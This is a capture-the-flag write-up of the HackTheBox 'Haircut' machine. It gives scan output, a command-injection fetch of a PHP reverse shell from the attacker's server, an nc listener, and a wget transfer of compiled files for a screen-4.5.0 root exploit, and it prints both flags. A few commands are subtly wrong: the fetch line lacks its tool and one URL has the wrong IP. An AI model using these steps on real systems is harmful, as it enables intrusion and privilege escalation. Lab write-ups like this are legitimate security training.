First start with an Nmap scan
# nmap -sV -sC -T4 -p- 10.10.10.24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 16:37 UTC
Nmap scan report for 10.10.10.24
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.49 seconds
Only a couple ports to work with. Checking out port 80 I are greeted with a basic webpage with a photo.
Running a gobuster I find a couple of pages.
# gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 20
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.24
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2019/09/26 16:46:56 Starting gobuster
===============================================================
/uploads (Status: 301)
/exposed.php (Status: 200)
The /uploads directory redirects us to a 403 so I cant do much there right now. The /exposed.php is the one that I want. In the top left I see a button that prints out a test.html file from the localhost.
I decided to try and see if I can interact with my attacking machine. To do this I set up a python SimpleHTTPServer on my attacking machine so I could attempt to transfer the a reverse shell over.
# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
# http://10.10.14.21/shell.php -o uploads/shell.php
Now I set up my nc listener and then triggered the shell by navigating to http://10.10.14.21/uploads/shell.php. If I check the listener then I will see that a shell has opened
# nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.24] 43682
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
19:45:58 up 1:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
From here I can grab the user flag
$ cat user.txt
0b0da2af50e9ab7c81a6ec2c562afeae
Now for the priv esc. If I run a LinEnum script you should see the vulnerable SUID binary screen-4.5.0.
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn
A quick google search will reveal the exploit here. The problem is the exploit does not work stright away because gcc is broken on the box so I need to compile libhax.c and rootshell.c locally and then upload them to the box.
# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
/tmp/libhax.c: In function ‘dropshell’:
# gcc -o /tmp/rootshell /tmp/rootshell.c
/tmp/rootshell.c: In function ‘main’:
Now I need to copy libhax.so and rootshell over to the /tmp directory on the box. I can do this using a python SimpleHTTPServer again
$ wget 10.10.14.21:8000/rootshell
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2019-09-26 21:02:00-- http://10.10.14.21:8000/rootshell
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16824 (16K) [application/octet-stream]
Saving to: 'rootshell'
0K .......... ...... 100% 562K=0.03s
2019-09-26 21:02:01 (562 KB/s) - 'rootshell' saved [16824/16824]
[+] done!
$ wget 10.10.14.21:8000/libhax.so
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2019-09-26 21:01:48-- http://10.10.14.21:8000/libhax.so
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16136 (16K) [application/octet-stream]
Saving to: 'libhax.so'
0K .......... ..... 100% 521K=0.03s
2019-09-26 21:01:48 (521 KB/s) - 'libhax.so' saved [16136/16136]
Now run the exploit from earlier
$ bash screenroot.sh
~ gnu/screenroot ~
[+] First, I create our shell and library...
gcc: error trying to exec 'cc1': execvp: No such file or directory
gcc: error trying to exec 'cc1': execvp: No such file or directory
[+] Now I create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
whoami
root
Now I can grab the root flag
# cat root.txt
4cfa26d84b2220826a07f0697dc72151